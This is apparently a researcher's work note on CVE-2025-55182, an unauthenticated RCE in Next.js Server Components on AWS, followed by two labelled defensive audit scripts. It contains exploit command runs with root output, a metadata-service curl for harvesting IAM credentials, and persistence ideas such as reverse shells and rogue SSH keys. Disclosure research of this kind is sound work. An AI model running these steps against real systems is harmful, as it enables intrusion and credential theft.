PRIMARY RESEARCH • CVE-2025-55182

React2Shell: Unveiling RCE in Next.js Server Components

Deep-dive into critical unauthenticated Remote Code Execution (RCE) affecting AWS-hosted Next.js applications. Full technical breakdown, exploitation chain, and cloud escalation paths.

CVSS 9.8 (Critical severity)  |  Root RCE (uid=0 confirmed)  |  10+ assets compromised

PRIMARY WORK NOTE • PWN-3465449 • Unauthenticated Root Command Execution

CVE-2025-55182: Next.js / React Server Components Deserialization RCE

Researcher: mishal (calloflight)  |  Date: 2025-12-15  |  Target: AWS EC2 (Amazon Elastic Compute Cloud)

This document serves as the official primary work note detailing the discovery, exploitation, and full system compromise of multiple internet-exposed Next.js servers. The vulnerability stems from unsafe deserialization + prototype pollution in React Server Components, enabling unauthenticated remote attackers to execute arbitrary OS commands as root. Below is the complete technical report, PoC outputs, and cloud impact analysis.


Vulnerability Classification

Weakness:             OS Command Injection / Unsafe Deserialization (CWE-78)
CVE ID:               CVE-2025-55182 (React2Shell)
Attack Vector:        Network, Unauthenticated
Privileges Required:  None
Impact:               Full confidentiality, integrity, availability compromise

Root Cause Analysis

The vulnerability exists within Next.js request handling for Server Actions. The react-server-dom-webpack package improperly deserializes attacker-controlled payloads, leading to prototype pollution. By crafting specific multipart requests, an attacker can pollute Object.prototype and trick the framework into invoking child_process.exec without any authentication. The exploitation flow:

1. Malformed RSC payload → unsafe deserialization
2. Prototype pollution → Node.js internal manipulation
3. require('child_process').exec(command) → root-level shell

Proof of Concept — Live Command Execution

Target IP (redacted): {REDACTED_EC2_IP} — Verified via amazonaws.com reverse DNS.

$ python3 exploit.py -u https://{TARGET_IP} --cmd "id"
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Outcome: Root privileges confirmed (uid=0). Full system takeover potential.

$ python3 exploit.py -u https://{TARGET_IP} --cmd "ls"
Dockerfile
server.js
prod_auth.json
next.config.ts
package.json
node_modules
public
supabase
middleware.ts
... (full directory enumeration)

Source Code Disclosure: cat server.js revealed internal HTTPS configuration and certificate paths.

const { createServer } = require('https')
const next = require('next')
const fs = require('fs')
const path = require('path')   // needed by the path.join() calls below; missing from the excerpt as captured
const httpsOptions = {
  key: fs.readFileSync(path.join(__dirname, 'certs/localhost-key.pem')),
  cert: fs.readFileSync(path.join(__dirname, 'certs/localhost.pem'))
}
// `app` is the Next.js application instance; its construction fell outside the captured excerpt
// (assumed reconstruction: next(options) is the standard custom-server entry point)
const app = next({ dev: false })
// the request handler passed to createServer was elided in the disclosure and is left as-is
app.prepare().then(() => createServer(httpsOptions, ...))

Write Access Confirmation: echo "pwned" > h1.txt → file successfully created inside the application root, proving arbitrary file write capabilities.

$ python3 exploit.py -u https://{TARGET_IP} --cmd "> h1.txt"
[+] File created. Re-listing shows h1.txt present.

Cloud Escalation & AWS Impact

While root RCE inside the container is critical, the research identified multiple cloud-specific escalation paths that drastically increase blast radius:

  • Metadata service abuse: Access to http://169.254.169.254/latest/meta-data/iam/security-credentials/ → IAM credentials → lateral movement to S3, Lambda, RDS.
  • Container escape risks: Misconfigured runtimes (privileged containers, hostPID) enable host OS takeover.
  • VPC pivoting: Compromised EC2 instance acts as a jumpbox to scan internal subnets, databases, and internal APIs.
  • Persistence & backdooring: Deploy reverse shell, rogue SSH keys, or implant into infrastructure.

# Example: Fetching instance role credentials via root RCE
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/   # potential privilege escalation
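As an added defensive example (not part of the researcher's work note): a POSIX shell audit for the metadata-service path listed above. It flags EC2 instances that still accept IMDSv1 or allow a PUT-response hop limit above 1, and enforces IMDSv2 on a given instance. The instance IDs in SAMPLE are constructed placeholders; the aws CLI calls are real but are not executed in the offline demonstration.

```shell
#!/bin/sh
# Audit EC2 instances for IMDSv1 exposure and enforce IMDSv2 with a hop limit of 1.
# Line format consumed by find_exposed (as produced by the describe-instances query below):
#   <instance-id> <HttpTokens: optional|required> <HttpPutResponseHopLimit>

# Returns 0 when the instance line describes a hardened configuration, 1 otherwise.
# "required" rejects the plain GET that IMDSv1 answers; a hop limit of 1 keeps the
# token response from crossing a bridge/NAT hop into a container network.
imds_hardened() {
  tokens=$2
  hop=$3
  [ "$tokens" = "required" ] && [ "$hop" -le 1 ]
}

# Reads describe-instances lines on stdin and prints the IDs that are still exposed.
find_exposed() {
  while read -r id tokens hop; do
    imds_hardened "$id" "$tokens" "$hop" || echo "$id"
  done
}

# Live inventory (needs AWS credentials; not run in this offline demonstration):
#   aws ec2 describe-instances --output text --query \
#     'Reservations[].Instances[].[InstanceId,MetadataOptions.HttpTokens,MetadataOptions.HttpPutResponseHopLimit]' \
#     | find_exposed

# Enforce IMDSv2-only access with hop limit 1 on one instance.
harden() {
  aws ec2 modify-instance-metadata-options --instance-id "$1" \
    --http-tokens required --http-put-response-hop-limit 1 --http-endpoint enabled
}

# Constructed sample inventory for the offline demonstration (IDs are placeholders).
SAMPLE='i-0aaa optional 2
i-0bbb required 1
i-0ccc required 2'

# Expected: i-0aaa (IMDSv1 allowed) and i-0ccc (hop limit 2) are reported.
printf '%s\n' "$SAMPLE" | find_exposed
```

Containers in host network mode reach IMDS without an extra hop, so the hop limit is no boundary there and the instance role itself must be scoped to least privilege.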

Exploit Reliability & Tooling

Custom Python exploit (exploit.py) reliably reproduces the vulnerability across all tested Next.js deployments. Verified using Assetnote React2Shell scanner. No authentication, no user interaction required. The exploit chain works consistently against both IPv4 targets and internal staging environments.

Artifacts Generated

  • exploit.py (weaponized)
  • poc_of_rce.mp4
  • react2shell_scan.png
  • verification_domain_hostnames.mp4

The attached video PoC demonstrates step-by-step command execution, full directory traversal, and source code theft, confirming the severity and reproducibility of the attack.

Research Conclusion

The Primary Work Note PWN-3465449 validates a complete unauthenticated RCE in Next.js Server Components exposed on AWS. The ability to execute arbitrary commands with root privileges makes this a catastrophic security boundary failure. The findings emphasize the importance of rigorous deserialization hardening and least-privilege container execution in cloud-native environments.
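Added example (not from the work note): a shell audit that ties the uid=0 result back to the container build and runtime settings named above. effective_user reports the user the final image stage runs as, runs_as_root flags images with no USER or a root USER, and host_escape_risk checks a running container for privileged mode or the host PID namespace. Both Dockerfiles are constructed for the demonstration.

```shell
#!/bin/sh
# Container least-privilege audit for the uid=0 finding: the runtime user is the last USER
# directive in the final build stage; with no USER the Node process runs as root.

# Prints the user the final image stage runs as ("root" when none is set).
effective_user() {
  awk '
    toupper($1) == "FROM" { user = "root" }   # every stage starts over as root
    toupper($1) == "USER" { user = $2 }
    END { print (user == "" ? "root" : user) }
  ' "$1"
}

# Returns 0 when the image would run as root (by name or uid 0, with or without a :group part).
runs_as_root() {
  u=$(effective_user "$1")
  u=${u%%:*}
  [ "$u" = "root" ] || [ "$u" = "0" ]
}

# Returns 0 when a running container has either host-takeover setting named above:
# privileged mode or the host PID namespace (reads docker inspect; not run offline).
host_escape_risk() {
  docker inspect --format '{{.HostConfig.Privileged}} {{.HostConfig.PidMode}}' "$1" |
    grep -Eq '^true|host$'
}

# Constructed Dockerfile that reproduces the finding: USER is set only in the build
# stage, so the final stage still starts server.js as root.
ROOT_DOCKERFILE='FROM node:20 AS build
USER node
FROM node:20-alpine
COPY --from=build /app /app
CMD ["node","server.js"]'

# Corrected form: drop privileges in the final stage before starting the server.
SAFE_DOCKERFILE='FROM node:20-alpine
COPY --chown=node:node . /app
USER node
CMD ["node","server.js"]'

check() {  # prints a verdict for a Dockerfile passed as a string
  tmp=$(mktemp); printf '%s\n' "$2" > "$tmp"
  if runs_as_root "$tmp"; then echo "$1: runs as root"; else echo "$1: runs as $(effective_user "$tmp")"; fi
  rm -f "$tmp"
}
check vulnerable "$ROOT_DOCKERFILE"   # vulnerable: runs as root
check hardened "$SAFE_DOCKERFILE"     # hardened: runs as node
```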

“Root access inside a cloud workload is a direct on-ramp to metadata service compromise and lateral movement. This research demonstrates why RCE in modern frameworks demands immediate incident response.” — mishal

Cloud Kill-Chain Impact

Unsanitized deserialization in Next.js → root RCE → Metadata service credential harvest → lateral movement across AWS account. This primary work showcases real-world offensive research against modern serverless/EC2 targets.

Tags: Unauthenticated Remote Code Execution • IAM credential theft • Container Escape Potential